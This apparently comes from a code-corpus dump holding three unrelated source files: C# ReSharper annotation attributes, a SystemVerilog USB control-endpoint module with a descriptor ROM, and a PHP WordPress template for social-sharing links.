[ContractAnnotation("halt &lt;= condition: 
false")] /// public void Assert(bool condition, string text) // regular assertion method /// </code></item> /// <item><code> /// [ContractAnnotation("s:null => true")] /// public bool IsNullOrEmpty(string s) // string.IsNullOrEmpty() /// </code></item> /// <item><code> /// // A method that returns null if the parameter is null, and not null if the parameter is not null /// [ContractAnnotation("null => null; notnull => notnull")] /// public object Transform(object data) /// </code></item> /// <item><code> /// [ContractAnnotation("s:null=>false; =>true,result:notnull; =>false, result:null")] /// public bool TryParse(string s, out Person result) /// </code></item> /// </list></examples> [AttributeUsage(AttributeTargets.Method, AllowMultiple = true, Inherited = true)] public sealed class ContractAnnotationAttribute : Attribute { public ContractAnnotationAttribute([NotNull] string contract) : this(contract, false) { } public ContractAnnotationAttribute([NotNull] string contract, bool forceFullStates) { Contract = contract; ForceFullStates = forceFullStates; } public string Contract { get; private set; } public bool ForceFullStates { get; private set; } } /// <summary> /// Indicates that marked element should be localized or not /// </summary> /// <example><code> /// [LocalizationRequiredAttribute(true)] /// public class Foo { /// private string str = "my string"; // Warning: Localizable string /// } /// </code></example> [AttributeUsage(AttributeTargets.All, AllowMultiple = false, Inherited = true)] public sealed class LocalizationRequiredAttribute : Attribute { public LocalizationRequiredAttribute() : this(true) { } public LocalizationRequiredAttribute(bool required) { Required = required; } public bool Required { get; private set; } } /// <summary> /// Indicates that the value of the marked type (or its derivatives) /// cannot be compared using '==' or '!=' operators and <c>Equals()</c> /// should be used instead. 
However, using '==' or '!=' for comparison /// with <c>null</c> is always permitted. /// </summary> /// <example><code> /// [CannotApplyEqualityOperator] /// class NoEquality { } /// class UsesNoEquality { /// public void Test() { /// var ca1 = new NoEquality(); /// var ca2 = new NoEquality(); /// if (ca1 != null) { // OK /// bool condition = ca1 == ca2; // Warning /// } /// } /// } /// </code></example> [AttributeUsage( AttributeTargets.Interface | AttributeTargets.Class | AttributeTargets.Struct, AllowMultiple = false, Inherited = true)] public sealed class CannotApplyEqualityOperatorAttribute : Attribute { } /// <summary> /// When applied to a target attribute, specifies a requirement for any type marked /// with the target attribute to implement or inherit specific type or types. /// </summary> /// <example><code> /// [BaseTypeRequired(typeof(IComponent)] // Specify requirement /// public class ComponentAttribute : Attribute { } /// [Component] // ComponentAttribute requires implementing IComponent interface /// public class MyComponent : IComponent { } /// </code></example> [AttributeUsage(AttributeTargets.Class, AllowMultiple = true, Inherited = true)] [BaseTypeRequired(typeof(Attribute))] public sealed class BaseTypeRequiredAttribute : Attribute { public BaseTypeRequiredAttribute([NotNull] Type baseType) { BaseType = baseType; } [NotNull] public Type BaseType { get; private set; } } /// <summary> /// Indicates that the marked symbol is used implicitly /// (e.g. 
via reflection, in external library), so this symbol /// will not be marked as unused (as well as by other usage inspections) /// </summary> [AttributeUsage(AttributeTargets.All, AllowMultiple = false, Inherited = true)] public sealed class UsedImplicitlyAttribute : Attribute { public UsedImplicitlyAttribute() : this(ImplicitUseKindFlags.Default, ImplicitUseTargetFlags.Default) { } public UsedImplicitlyAttribute(ImplicitUseKindFlags useKindFlags) : this(useKindFlags, ImplicitUseTargetFlags.Default) { } public UsedImplicitlyAttribute(ImplicitUseTargetFlags targetFlags) : this(ImplicitUseKindFlags.Default, targetFlags) { } public UsedImplicitlyAttribute( ImplicitUseKindFlags useKindFlags, ImplicitUseTargetFlags targetFlags) { UseKindFlags = useKindFlags; TargetFlags = targetFlags; } public ImplicitUseKindFlags UseKindFlags { get; private set; } public ImplicitUseTargetFlags TargetFlags { get; private set; } } /// <summary> /// Should be used on attributes and causes ReSharper /// to not mark symbols marked with such attributes as unused /// (as well as by other usage inspections) /// </summary> [AttributeUsage(AttributeTargets.Class, AllowMultiple = false, Inherited = true)] public sealed class MeansImplicitUseAttribute : Attribute { public MeansImplicitUseAttribute() : this(ImplicitUseKindFlags.Default, ImplicitUseTargetFlags.Default) { } public MeansImplicitUseAttribute(ImplicitUseKindFlags useKindFlags) : this(useKindFlags, ImplicitUseTargetFlags.Default) { } public MeansImplicitUseAttribute(ImplicitUseTargetFlags targetFlags) : this(ImplicitUseKindFlags.Default, targetFlags) { } public MeansImplicitUseAttribute( ImplicitUseKindFlags useKindFlags, ImplicitUseTargetFlags targetFlags) { UseKindFlags = useKindFlags; TargetFlags = targetFlags; } [UsedImplicitly] public ImplicitUseKindFlags UseKindFlags { get; private set; } [UsedImplicitly] public ImplicitUseTargetFlags TargetFlags { get; private set; } } [Flags] public enum ImplicitUseKindFlags { Default = Access | 
Assign | InstantiatedWithFixedConstructorSignature, /// <summary>Only entity marked with attribute considered used</summary> Access = 1, /// <summary>Indicates implicit assignment to a member</summary> Assign = 2, /// <summary> /// Indicates implicit instantiation of a type with fixed constructor signature. /// That means any unused constructor parameters won't be reported as such. /// </summary> InstantiatedWithFixedConstructorSignature = 4, /// <summary>Indicates implicit instantiation of a type</summary> InstantiatedNoFixedConstructorSignature = 8, } /// <summary> /// Specify what is considered used implicitly /// when marked with <see cref="MeansImplicitUseAttribute"/> /// or <see cref="UsedImplicitlyAttribute"/> /// </summary> [Flags] public enum ImplicitUseTargetFlags { Default = Itself, Itself = 1, /// <summary>Members of entity marked with attribute are considered used</summary> Members = 2, /// <summary>Entity marked with attribute and all its members considered used</summary> WithMembers = Itself | Members } /// <summary> /// This attribute is intended to mark publicly available API /// which should not be removed and so is treated as used /// </summary> [MeansImplicitUse] public sealed class PublicAPIAttribute : Attribute { public PublicAPIAttribute() { } public PublicAPIAttribute([NotNull] string comment) { Comment = comment; } [NotNull] public string Comment { get; private set; } } /// <summary> /// Tells code analysis engine if the parameter is completely handled /// when the invoked method is on stack. If the parameter is a delegate, /// indicates that delegate is executed while the method is executed. /// If the parameter is an enumerable, indicates that it is enumerated /// while the method is executed /// </summary> [AttributeUsage(AttributeTargets.Parameter, Inherited = true)] public sealed class InstantHandleAttribute : Attribute { } /// <summary> /// Indicates that a method does not make any observable state changes. 
/// The same as <c>System.Diagnostics.Contracts.PureAttribute</c> /// </summary> /// <example><code> /// [Pure] private int Multiply(int x, int y) { return x * y; } /// public void Foo() { /// const int a = 2, b = 2; /// Multiply(a, b); // Waring: Return value of pure method is not used /// } /// </code></example> [AttributeUsage(AttributeTargets.Method, Inherited = true)] public sealed class PureAttribute : Attribute { } /// <summary> /// Indicates that a parameter is a path to a file or a folder /// within a web project. Path can be relative or absolute, /// starting from web root (~) /// </summary> [AttributeUsage(AttributeTargets.Parameter)] public class PathReferenceAttribute : Attribute { public PathReferenceAttribute() { } public PathReferenceAttribute([PathReference] string basePath) { BasePath = basePath; } [NotNull] public string BasePath { get; private set; } } // ASP.NET MVC attributes [AttributeUsage(AttributeTargets.Assembly, AllowMultiple = true)] public sealed class AspMvcAreaMasterLocationFormatAttribute : Attribute { public AspMvcAreaMasterLocationFormatAttribute(string format) { } } [AttributeUsage(AttributeTargets.Assembly, AllowMultiple = true)] public sealed class AspMvcAreaPartialViewLocationFormatAttribute : Attribute { public AspMvcAreaPartialViewLocationFormatAttribute(string format) { } } [AttributeUsage(AttributeTargets.Assembly, AllowMultiple = true)] public sealed class AspMvcAreaViewLocationFormatAttribute : Attribute { public AspMvcAreaViewLocationFormatAttribute(string format) { } } [AttributeUsage(AttributeTargets.Assembly, AllowMultiple = true)] public sealed class AspMvcMasterLocationFormatAttribute : Attribute { public AspMvcMasterLocationFormatAttribute(string format) { } } [AttributeUsage(AttributeTargets.Assembly, AllowMultiple = true)] public sealed class AspMvcPartialViewLocationFormatAttribute : Attribute { public AspMvcPartialViewLocationFormatAttribute(string format) { } } [AttributeUsage(AttributeTargets.Assembly, 
AllowMultiple = true)] public sealed class AspMvcViewLocationFormatAttribute : Attribute { public AspMvcViewLocationFormatAttribute(string format) { } } /// <summary> /// ASP.NET MVC attribute. If applied to a parameter, indicates that the parameter /// is an MVC action. If applied to a method, the MVC action name is calculated /// implicitly from the context. Use this attribute for custom wrappers similar to /// <c>System.Web.Mvc.Html.ChildActionExtensions.RenderAction(HtmlHelper, String)</c> /// </summary> [AttributeUsage(AttributeTargets.Parameter | AttributeTargets.Method)] public sealed class AspMvcActionAttribute : Attribute { public AspMvcActionAttribute() { } public AspMvcActionAttribute([NotNull] string anonymousProperty) { AnonymousProperty = anonymousProperty; } [NotNull] public string AnonymousProperty { get; private set; } } /// <summary> /// ASP.NET MVC attribute. Indicates that a parameter is an MVC area. /// Use this attribute for custom wrappers similar to /// <c>System.Web.Mvc.Html.ChildActionExtensions.RenderAction(HtmlHelper, String)</c> /// </summary> [AttributeUsage(AttributeTargets.Parameter)] public sealed class AspMvcAreaAttribute : PathReferenceAttribute { public AspMvcAreaAttribute() { } public AspMvcAreaAttribute([NotNull] string anonymousProperty) { AnonymousProperty = anonymousProperty; } [NotNull] public string AnonymousProperty { get; private set; } } /// <summary> /// ASP.NET MVC attribute. If applied to a parameter, indicates that /// the parameter is an MVC controller. If applied to a method, /// the MVC controller name is calculated implicitly from the context. 
/// Use this attribute for custom wrappers similar to /// <c>System.Web.Mvc.Html.ChildActionExtensions.RenderAction(HtmlHelper, String, String)</c> /// </summary> [AttributeUsage(AttributeTargets.Parameter | AttributeTargets.Method)] public sealed class AspMvcControllerAttribute : Attribute { public AspMvcControllerAttribute() { } public AspMvcControllerAttribute([NotNull] string anonymousProperty) { AnonymousProperty = anonymousProperty; } [NotNull] public string AnonymousProperty { get; private set; } } /// <summary> /// ASP.NET MVC attribute. Indicates that a parameter is an MVC Master. /// Use this attribute for custom wrappers similar to /// <c>System.Web.Mvc.Controller.View(String, String)</c> /// </summary> [AttributeUsage(AttributeTargets.Parameter)] public sealed class AspMvcMasterAttribute : Attribute { } /// <summary> /// ASP.NET MVC attribute. Indicates that a parameter is an MVC model type. /// Use this attribute for custom wrappers similar to /// <c>System.Web.Mvc.Controller.View(String, Object)</c> /// </summary> [AttributeUsage(AttributeTargets.Parameter)] public sealed class AspMvcModelTypeAttribute : Attribute { } /// <summary> /// ASP.NET MVC attribute. If applied to a parameter, indicates that /// the parameter is an MVC partial view. If applied to a method, /// the MVC partial view name is calculated implicitly from the context. /// Use this attribute for custom wrappers similar to /// <c>System.Web.Mvc.Html.RenderPartialExtensions.RenderPartial(HtmlHelper, String)</c> /// </summary> [AttributeUsage(AttributeTargets.Parameter | AttributeTargets.Method)] public sealed class AspMvcPartialViewAttribute : PathReferenceAttribute { } /// <summary> /// ASP.NET MVC attribute. Allows disabling all inspections /// for MVC views within a class or a method. /// </summary> [AttributeUsage(AttributeTargets.Class | AttributeTargets.Method)] public sealed class AspMvcSupressViewErrorAttribute : Attribute { } /// <summary> /// ASP.NET MVC attribute. 
Indicates that a parameter is an MVC display template. /// Use this attribute for custom wrappers similar to /// <c>System.Web.Mvc.Html.DisplayExtensions.DisplayForModel(HtmlHelper, String)</c> /// </summary> [AttributeUsage(AttributeTargets.Parameter)] public sealed class AspMvcDisplayTemplateAttribute : Attribute { } /// <summary> /// ASP.NET MVC attribute. Indicates that a parameter is an MVC editor template. /// Use this attribute for custom wrappers similar to /// <c>System.Web.Mvc.Html.EditorExtensions.EditorForModel(HtmlHelper, String)</c> /// </summary> [AttributeUsage(AttributeTargets.Parameter)] public sealed class AspMvcEditorTemplateAttribute : Attribute { } /// <summary> /// ASP.NET MVC attribute. Indicates that a parameter is an MVC template. /// Use this attribute for custom wrappers similar to /// <c>System.ComponentModel.DataAnnotations.UIHintAttribute(System.String)</c> /// </summary> [AttributeUsage(AttributeTargets.Parameter)] public sealed class AspMvcTemplateAttribute : Attribute { } /// <summary> /// ASP.NET MVC attribute. If applied to a parameter, indicates that the parameter /// is an MVC view. If applied to a method, the MVC view name is calculated implicitly /// from the context. Use this attribute for custom wrappers similar to /// <c>System.Web.Mvc.Controller.View(Object)</c> /// </summary> [AttributeUsage(AttributeTargets.Parameter | AttributeTargets.Method)] public sealed class AspMvcViewAttribute : PathReferenceAttribute { } /// <summary> /// ASP.NET MVC attribute. 
When applied to a parameter of an attribute, /// indicates that this parameter is an MVC action name /// </summary> /// <example><code> /// [ActionName("Foo")] /// public ActionResult Login(string returnUrl) { /// ViewBag.ReturnUrl = Url.Action("Foo"); // OK /// return RedirectToAction("Bar"); // Error: Cannot resolve action /// } /// </code></example> [AttributeUsage(AttributeTargets.Parameter | AttributeTargets.Property)] public sealed class AspMvcActionSelectorAttribute : Attribute { } [AttributeUsage( AttributeTargets.Parameter | AttributeTargets.Property | AttributeTargets.Field, Inherited = true)] public sealed class HtmlElementAttributesAttribute : Attribute { public HtmlElementAttributesAttribute() { } public HtmlElementAttributesAttribute([NotNull] string name) { Name = name; } [NotNull] public string Name { get; private set; } } [AttributeUsage( AttributeTargets.Parameter | AttributeTargets.Field | AttributeTargets.Property, Inherited = true)] public sealed class HtmlAttributeValueAttribute : Attribute { public HtmlAttributeValueAttribute([NotNull] string name) { Name = name; } [NotNull] public string Name { get; private set; } } // Razor attributes /// <summary> /// Razor attribute. Indicates that a parameter or a method is a Razor section. /// Use this attribute for custom wrappers similar to /// <c>System.Web.WebPages.WebPageBase.RenderSection(String)</c> /// </summary> [AttributeUsage(AttributeTargets.Parameter | AttributeTargets.Method, Inherited = true)] public sealed class RazorSectionAttribute : Attribute { } }
{ "pile_set_name": "Github" }
// Copyright lowRISC contributors.
// Copyright Luke Valenty (TinyFPGA project)
// Licensed under the Apache License, Version 2.0, see LICENSE for details.
// SPDX-License-Identifier: Apache-2.0
//
// Converted from common/usb_serial_ctrl_ep.v
// -- move from CDC to Google simple serial protocol
// -- conform to lowRISC coding style

// USB default control endpoint (EP0).
//
// Captures the 8-byte SETUP packet from the OUT endpoint interface, runs the
// standard control-transfer sequence (setup -> optional data stage -> status
// stage), serves GET_DESCRIPTOR data from an inline descriptor ROM on the IN
// endpoint interface, and latches the address assigned by SET_ADDRESS onto
// dev_addr once the status stage completes.
module usb_serial_ctrl_ep #(
  parameter int unsigned MaxPktSizeByte = 32,

  // Derived parameters
  localparam int unsigned PktW = $clog2(MaxPktSizeByte)
) (
  input clk_i,
  input rst_ni,
  // Current USB device address (0 until SET_ADDRESS completes)
  output logic [6:0] dev_addr,

  ////////////////////////////
  // out endpoint interface //
  ////////////////////////////
  input out_ep_data_put_i,               // a data byte is being written
  input [PktW - 1:0] out_ep_put_addr_i,  // byte offset within the OUT packet
  input [7:0] out_ep_data_i,             // the data byte itself
  input out_ep_acked_i,                  // OUT packet was ACKed
  input out_ep_rollback_i,               // OUT packet must be discarded (e.g. bad CRC)
  input out_ep_setup_i,                  // current OUT packet is a SETUP packet
  output logic out_ep_full_o,
  output logic out_ep_stall_o,

  ///////////////////////////
  // in endpoint interface //
  ///////////////////////////
  input in_ep_rollback_i,
  input in_ep_acked_i,                   // IN packet was ACKed by the host
  input [PktW - 1:0] in_ep_get_addr_i,
  input in_ep_data_get_i,                // a data byte is being read
  output logic in_ep_stall_o,
  output logic in_ep_has_data_o,
  output logic [7:0] in_ep_data_o,       // descriptor ROM read data
  output logic in_ep_data_done_o
);

  // suppress errors
  logic unused_1;
  logic [PktW-1:0] unused_2;
  assign unused_1 = in_ep_rollback_i;
  assign unused_2 = in_ep_get_addr_i;

  import usb_consts_pkg::*;

  // State machine for control transfers
  typedef enum logic [2:0] {
    StIdle = 3'h0,
    StSetup = 3'h1,
    StDataIn = 3'h2,
    StDataOut = 3'h3,
    StStatusIn = 3'h4,
    StStatusOut = 3'h5
  } state_ctrl_xfr_e;

  state_ctrl_xfr_e ctrl_xfr_state;
  state_ctrl_xfr_e ctrl_xfr_state_next;
  logic setup_stage_end;
  logic status_stage_end;
  logic send_zero_length_data_pkt;

  // the default control endpoint gets assigned the device address
  logic [6:0] dev_addr_int;
  logic [6:0] new_dev_addr;

  assign dev_addr = dev_addr_int;

  // EP0 never stalls the OUT side and always has buffer space available
  assign out_ep_stall_o = 1'b0;
  assign out_ep_full_o = 1'b0;

  // keep track of new out data start and end
  logic pkt_start;
  logic pkt_end;

  // First byte written at offset 0 marks the start of a packet
  assign pkt_start = (out_ep_put_addr_i == 0) && out_ep_data_put_i;
  assign pkt_end = out_ep_acked_i || out_ep_rollback_i;

  // need to record the 8 bytes of setup data
  logic [7:0] bmRequestType, raw_setup_data [8];
  // Alias for the setup bytes using names from USB spec
  usb_setup_request_e bRequest;
  logic [15:0] wValue, wLength, wIndex;

  logic setup_pkt_start, has_data_stage, out_data_stage, in_data_stage;
  assign setup_pkt_start = pkt_start && out_ep_setup_i;
  assign has_data_stage = wLength != 16'h0;
  // bmRequestType[7]: transfer direction, 1 = device-to-host (IN data stage)
  assign out_data_stage = has_data_stage && !bmRequestType[7];
  assign in_data_stage = has_data_stage && bmRequestType[7];

  logic [7:0] bytes_sent;
  logic [6:0] rom_length;
  logic all_data_sent, more_data_to_send, in_data_transfer_done;

  // if any upper bits in wLength are set the rom_length will trigger first
  // here any request for >127 will generate a check based on >128
  assign all_data_sent = (bytes_sent >= {1'b0, rom_length}) ||
                         (bytes_sent >= {|wLength[15:7], wLength[6:0]});

  assign more_data_to_send = !all_data_sent;

  // Single-cycle pulse on the cycle all_data_sent first goes high
  // (rising_edge_detector is a project-local module, defined elsewhere)
  rising_edge_detector detect_in_data_transfer_done (
    .clk_i (clk_i),
    .rst_ni(rst_ni),
    .in_i  (all_data_sent),
    .out_o (in_data_transfer_done)
  );

  assign in_ep_has_data_o = more_data_to_send || send_zero_length_data_pkt;
  assign in_ep_data_done_o = (in_data_transfer_done && (ctrl_xfr_state == StDataIn)) ||
                             send_zero_length_data_pkt;

  logic [6:0] rom_addr;
  logic save_dev_addr;

  ////////////////////////////////////
  // control transfer state machine //
  ////////////////////////////////////

  always_comb begin
    setup_stage_end = 1'b0;
    status_stage_end = 1'b0;
    send_zero_length_data_pkt = 1'b0;

    unique case (ctrl_xfr_state)
      StIdle: begin
        if (setup_pkt_start) begin
          ctrl_xfr_state_next = StSetup;
        end else begin
          ctrl_xfr_state_next = StIdle;
        end
      end

      StSetup: begin
        if (pkt_end) begin
          // rollback here is most likely a CRC error on the SETUP packet
          if (out_ep_rollback_i) begin
            ctrl_xfr_state_next = StIdle;
          end else if (in_data_stage) begin
            ctrl_xfr_state_next = StDataIn;
            setup_stage_end = 1'b1;
          end else if (out_data_stage) begin
            ctrl_xfr_state_next = StDataOut;
            setup_stage_end = 1'b1;
          end else begin
            // No data stage: go straight to a zero-length IN status stage
            ctrl_xfr_state_next = StStatusIn;
            send_zero_length_data_pkt = 1'b1;
            setup_stage_end = 1'b1;
          end
        end else begin
          ctrl_xfr_state_next = StSetup;
        end
      end

      StDataIn: begin
        if (in_ep_stall_o) begin
          // Request was stalled (e.g. device qualifier descriptor); abort
          ctrl_xfr_state_next = StIdle;
          status_stage_end = 1'b1;
        end else if (in_ep_acked_i && all_data_sent) begin
          ctrl_xfr_state_next = StStatusOut;
        end else begin
          ctrl_xfr_state_next = StDataIn;
        end
      end

      StDataOut: begin
        if (out_ep_acked_i) begin
          ctrl_xfr_state_next = StStatusIn;
          send_zero_length_data_pkt = 1'b1;
        end else begin
          ctrl_xfr_state_next = StDataOut;
        end
      end

      StStatusIn: begin
        if (in_ep_acked_i) begin
          ctrl_xfr_state_next = StIdle;
          status_stage_end = 1'b1;
        end else begin
          ctrl_xfr_state_next = StStatusIn;
          send_zero_length_data_pkt = 1'b1;
        end
      end

      StStatusOut: begin
        if (out_ep_acked_i) begin
          ctrl_xfr_state_next = StIdle;
          status_stage_end = 1'b1;
        end else begin
          ctrl_xfr_state_next = StStatusOut;
        end
      end

      default begin
        ctrl_xfr_state_next = StIdle;
      end
    endcase
  end

  always_ff @(posedge clk_i or negedge rst_ni) begin
    if (!rst_ni) begin
      ctrl_xfr_state <= StIdle;
    end else begin
      ctrl_xfr_state <= ctrl_xfr_state_next;
    end
  end

  // Unpack the raw SETUP bytes; multi-byte fields are little-endian per USB
  assign bmRequestType = raw_setup_data[0];
  assign bRequest = usb_setup_request_e'(raw_setup_data[1]);
  assign wValue = {raw_setup_data[3][7:0], raw_setup_data[2][7:0]};
  assign wIndex = {raw_setup_data[5][7:0], raw_setup_data[4][7:0]};
  assign wLength = {raw_setup_data[7][7:0], raw_setup_data[6][7:0]};

  // suppress warning
  logic [6:0] unused_bmR;
  logic unused_wValue;
  logic [15:0] unused_wIndex;
  assign unused_bmR = bmRequestType[6:0];
  assign unused_wValue = wValue[7];
  assign unused_wIndex = wIndex;

  // Check of upper put_addr bits needed because CRC will be sent (10 bytes total)
  // NOTE(review): raw_setup_data is intentionally not reset; it is fully
  // written by each SETUP packet before being consumed.
  always_ff @(posedge clk_i) begin
    if (out_ep_setup_i && out_ep_data_put_i && (out_ep_put_addr_i[PktW - 1:3] == '0)) begin
      raw_setup_data[out_ep_put_addr_i[2:0]] <= out_ep_data_i;
    end
  end

  // Send setup data (which will be empty in case of a SET operation and
  // come from the ROM in the case of a GET)
  usb_dscr_type_e dscr_type;
  assign dscr_type = usb_dscr_type_e'(wValue[15:8]);

  // Request decode and descriptor ROM read pointer management.
  // NOTE(review): bytes_sent / rom_addr / rom_length / new_dev_addr have no
  // reset value; they are loaded at setup_stage_end before first use —
  // confirm this matches the project's lint waivers.
  always_ff @(posedge clk_i or negedge rst_ni) begin
    if (!rst_ni) begin
      dev_addr_int <= '0;
      save_dev_addr <= 1'b0;
      in_ep_stall_o <= 1'b0;
    end else begin
      if (setup_stage_end) begin
        bytes_sent <= '0;
        // Command (bRequest) and sub-command (wValue) come from USB spec
        unique case (bRequest)
          SetupGetDescriptor: begin
            unique case (dscr_type)
              DscrTypeDevice: begin
                in_ep_stall_o <= 1'b0;
                rom_addr   <= 7'h00;   // device descriptor at ROM offset 0
                rom_length <= 7'h12;   // 18 bytes
              end

              DscrTypeConfiguration: begin
                in_ep_stall_o <= 1'b0;
                rom_addr   <= 7'h12;   // config descriptor follows device descriptor
                rom_length <= 7'h20; // 9+9+7+7
              end

              DscrTypeDevQual: begin
                // Full-speed-only device: STALL device qualifier requests
                in_ep_stall_o <= 1'b1;
                rom_addr   <= 7'h00;
                rom_length <= 7'h00;
              end

              default begin
                in_ep_stall_o <= 1'b0;
                rom_addr   <= 7'h00;
                rom_length <= 7'h00;
              end
            endcase
          end

          SetupSetAddress: begin
            in_ep_stall_o <= 1'b0;
            rom_addr   <= 7'h00;
            rom_length <= 7'h00;

            // we need to save the address after the status stage ends
            // this is because the status stage token will still be using
            // the old device address
            save_dev_addr <= 1'b1;
            new_dev_addr <= wValue[6:0];
          end

          SetupSetConfiguration: begin
            // Only one configuration exists; nothing to do beyond ACK
            in_ep_stall_o <= 1'b0;
            rom_addr   <= 7'h00;
            rom_length <= 7'h00;
          end

          default begin
            in_ep_stall_o <= 1'b0;
            rom_addr   <= 7'h00;
            rom_length <= 7'h00;
          end
        endcase
      end else if ((ctrl_xfr_state == StDataIn) && more_data_to_send && in_ep_data_get_i) begin
        // Advance through the ROM as the host reads descriptor bytes
        rom_addr   <= rom_addr + 7'h1;
        bytes_sent <= bytes_sent + 8'h1;
      end else if (status_stage_end) begin
        bytes_sent <= '0;
        rom_addr   <= '0;
        rom_length <= '0;
        if (save_dev_addr) begin
          save_dev_addr <= 1'b0;
          dev_addr_int <= new_dev_addr;
        end
      end
    end
  end

  // Inline descriptor ROM: device, configuration, interface and two bulk
  // endpoint descriptors, addressed by rom_addr.
  always_comb begin
    unique case (rom_addr)
      // device descriptor
      'h000: in_ep_data_o = 8'd18;   // bLength
      'h001: in_ep_data_o = {DscrTypeDevice}; // bDescriptorType
      'h002: in_ep_data_o = 8'h00;   // bcdUSB[0]
      'h003: in_ep_data_o = 8'h02;   // bcdUSB[1]
      'h004: in_ep_data_o = 8'h00;   // bDeviceClass (defined at interface level)
      'h005: in_ep_data_o = 8'h00;   // bDeviceSubClass
      'h006: in_ep_data_o = 8'h00;   // bDeviceProtocol
      'h007: in_ep_data_o = 8'd32;   // bMaxPacketSize0
      'h008: in_ep_data_o = 8'hd1;   // idVendor[0] 0x18d1 Google Inc.
      'h009: in_ep_data_o = 8'h18;   // idVendor[1]
      'h00A: in_ep_data_o = 8'h39;   // idProduct[0] Simple Serial USB IP
      'h00B: in_ep_data_o = 8'h50;   // idProduct[1] (Allocated in Chrome OS block for this IP)
      'h00C: in_ep_data_o = 8'h0;    // bcdDevice[0]
      'h00D: in_ep_data_o = 8'h1;    // bcdDevice[1]
      'h00E: in_ep_data_o = 8'h0;    // iManufacturer
      'h00F: in_ep_data_o = 8'h0;    // iProduct
      'h010: in_ep_data_o = 8'h0;    // iSerialNumber
      'h011: in_ep_data_o = 8'h1;    // bNumConfigurations

      // configuration descriptor
      'h012: in_ep_data_o = 8'd9;    // bLength
      'h013: in_ep_data_o = {DscrTypeConfiguration}; // bDescriptorType
      'h014: in_ep_data_o = 8'(9+9+7+7); // wTotalLength[0]
      'h015: in_ep_data_o = 8'h0;    // wTotalLength[1]
      'h016: in_ep_data_o = 8'h1;    // bNumInterfaces
      'h017: in_ep_data_o = 8'h1;    // bConfigurationValue
      'h018: in_ep_data_o = 8'h0;    // iConfiguration
      'h019: in_ep_data_o = 8'hC0;   // bmAttributes: must-be-one, self-powered
      'h01A: in_ep_data_o = 8'd50;   // bMaxPower

      // interface descriptor, USB spec 9.6.5, page 267-269, Table 9-12
      'h01B: in_ep_data_o = 8'd9;    // bLength
      'h01C: in_ep_data_o = {DscrTypeInterface}; // bDescriptorType
      'h01D: in_ep_data_o = 8'h0;    // bInterfaceNumber
      'h01E: in_ep_data_o = 8'h0;    // bAlternateSetting
      'h01F: in_ep_data_o = 8'h2;    // bNumEndpoints (must follow below)
      'h020: in_ep_data_o = 8'hff;   // bInterfaceClass (Vendor Specific Class)
      'h021: in_ep_data_o = 8'h50;   // bInterfaceSubClass (Simple serial)
      'h022: in_ep_data_o = 8'h1;    // bInterfaceProtocol (standard)
      'h023: in_ep_data_o = 8'h0;    // iInterface

      // endpoint descriptor, USB spec 9.6.6, page 269-271, Table 9-13
      'h024: in_ep_data_o = 8'd7;    // bLength
      'h025: in_ep_data_o = {DscrTypeEndpoint}; // bDescriptorType
      'h026: in_ep_data_o = 8'h1;    // bEndpointAddress, OUT
      'h027: in_ep_data_o = 8'h02;   // bmAttributes (0x02=bulk, data)
      'h028: in_ep_data_o = 8'd32;   // wMaxPacketSize[0]
      'h029: in_ep_data_o = 8'h0;    // wMaxPacketSize[1]
      'h02A: in_ep_data_o = 8'h0;    // bInterval

      // endpoint descriptor, USB spec 9.6.6, page 269-271, Table 9-13
      'h02B: in_ep_data_o = 8'd7;    // bLength
      'h02C: in_ep_data_o = {DscrTypeEndpoint}; // bDescriptorType
      'h02D: in_ep_data_o = 8'h81;   // bEndpointAddress, IN
      'h02E: in_ep_data_o = 8'h02;   // bmAttributes (0x02=bulk, data)
      'h02F: in_ep_data_o = 8'd32;   // wMaxPacketSize[0]
      'h030: in_ep_data_o = 8'h0;    // wMaxPacketSize[1]
      'h031: in_ep_data_o = 8'h4;    // bInterval (4 vs 10 in twinkie)

      default begin
        in_ep_data_o = 0;
      end
    endcase
  end

endmodule
{ "pile_set_name": "Github" }
<?php
/**
 * Display social sharing icons.
 *
 * Renders Twitter, Facebook and LinkedIn share links for the current post.
 * Each link opens the network's share dialog in a popup window via the
 * inline onclick handler and falls back to plain navigation via the href
 * when JavaScript is disabled. Share URLs come from the project's
 * _s_get_*_share_url() helpers.
 *
 * @package _s
 */

// One entry per network. This replaces three copy-pasted <li> blocks with a
// single loop; 'popup' holds the window.open() feature string (LinkedIn's
// dialog needs a taller, narrower window than the other two).
$_s_share_networks = array(
	array(
		'icon'  => 'twitter-square',
		'title' => __( 'Twitter', '_s' ),
		'desc'  => esc_html__( 'Share on Twitter', '_s' ),
		'url'   => _s_get_twitter_share_url(),
		'popup' => 'toolbar=no, location=no, status=no, menubar=no, scrollbars=yes, resizable=yes, top=150, left=0, width=600, height=300',
	),
	array(
		'icon'  => 'facebook-square',
		'title' => __( 'Facebook', '_s' ),
		'desc'  => esc_html__( 'Share on Facebook', '_s' ),
		'url'   => _s_get_facebook_share_url(),
		'popup' => 'toolbar=no, location=no, status=no, menubar=no, scrollbars=yes, resizable=yes, top=150, left=0, width=600, height=300',
	),
	array(
		'icon'  => 'linkedin-square',
		'title' => __( 'LinkedIn', '_s' ),
		'desc'  => esc_html__( 'Share on LinkedIn', '_s' ),
		'url'   => _s_get_linkedin_share_url(),
		'popup' => 'toolbar=no, location=no, status=no, menubar=no, scrollbars=yes, resizable=yes, top=150, left=0, width=475, height=505',
	),
);
?>

<div class="social-share">
	<h5 class="social-share-title"><?php esc_html_e( 'Share This', '_s' ); ?></h5>
	<ul class="social-icons menu menu-horizontal">
		<?php foreach ( $_s_share_networks as $_s_network ) : ?>
			<li class="social-icon">
				<a href="<?php echo esc_url( $_s_network['url'] ); ?>" onclick="window.open(this.href, 'targetWindow', '<?php echo esc_attr( $_s_network['popup'] ); ?>' ); return false;">
					<?php
					_s_display_svg(
						array(
							'icon'  => $_s_network['icon'],
							'title' => $_s_network['title'],
							'desc'  => $_s_network['desc'],
						)
					);
					?>
					<span class="screen-reader-text"><?php echo $_s_network['desc']; // Already escaped via esc_html__(). ?></span>
				</a>
			</li>
		<?php endforeach; ?>
	</ul>
</div><!-- .social-share -->
<?php
// Avoid leaking loop variables into other template parts.
unset( $_s_share_networks, $_s_network );
{ "pile_set_name": "Github" }